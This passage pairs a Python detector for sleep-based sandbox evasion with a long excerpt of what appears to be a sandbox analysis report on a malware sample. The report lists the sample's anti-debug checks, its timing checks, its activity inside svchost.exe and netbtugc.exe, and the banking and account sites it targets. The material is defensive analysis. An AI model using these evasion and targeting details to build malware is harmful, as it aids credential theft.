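def flag_threads(stats: Dict[int, SleepStats]) -> Dict[int, List[str]]:
    """tid -> reasons for threads that look like they are stalling the analysis."""
    flagged: Dict[int, List[str]] = {}
    for tid, s in stats.items():
        reasons = []
        if s.count > MAX_CALLS:
            reasons.append(f"{s.count} delay calls > {MAX_CALLS}")
        if s.total_ms >= MAX_TOTAL_MS:
            reasons.append(f"{s.total_ms} ms total delay >= {MAX_TOTAL_MS}")
        if reasons:
            flagged[tid] = reasons
    return flagged


# Constructed trace reproducing the report's numbers: thread 8128 with 3972 delays
# of 2000 ms, thread 8180 with two long delays, and a benign thread with three short ones.
TRACE = (["8128 NtDelayExecution 2000"] * 3972
         + ["8180 Sleep 75000", "8180 Sleep 35000"]
         + ["4 Sleep 100"] * 3
         + ["4 GetTickCount 0"])          # non-delay API on the benign thread, ignored

if __name__ == "__main__":
    for tid, reasons in flag_threads(parse_trace(TRACE)).items():
        print(tid, reasons)
```

Thread 8180 is flagged on total alone (two calls, 110000 ms), thread 8128 on both count and total, and the benign thread on neither. The rdtsc in svchost.exe and the GetTickCount-style timing the report lists under "execution timing" are the complement to this trick: after sleeping, the code checks that wall-clock time really advanced, so a sandbox that merely skips the sleeps is detected.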
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_007F6CA9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_007F60DD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_007F63F9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007FEB60
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FF56F FindFirstFileW,FindClose, 0_2_007FF56F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_007FF5FA
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00801B2F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00801C8A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00801F94
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_0282BAB0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007CDDC0
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: F56GKLK7U4.4.dr | Binary or memory string: tasks.office.comVMware20,11696503903o
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,=?{q6
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: F56GKLK7U4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: F56GKLK7U4.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: F56GKLK7U4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696503903x
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Transaction PasswordVMware20,11696503903}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: F56GKLK7U4.4.dr | Binary or memory string: global block list test formVMware20,11696503903
            Source: F56GKLK7U4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: F56GKLK7U4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696503903
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: F56GKLK7U4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: F56GKLK7U4.4.dr | Binary or memory string: AMC password management pageVMware20,11696503903
            Source: F56GKLK7U4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1759667400.000001E0068FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3778243505.0000000001389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696503903f
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeAPI call chain: ExitProcess graph end nodegraph_0-94317
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806AAF BlockInput,0_2_00806AAF
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3D19
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_007E3920
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CE01E LoadLibraryA,GetProcAddress,0_2_007CE01E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF2548 mov eax, dword ptr fs:[00000030h]0_2_00EF2548
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF3BC8 mov eax, dword ptr fs:[00000030h]0_2_00EF3BC8
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF3B68 mov eax, dword ptr fs:[00000030h]0_2_00EF3B68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
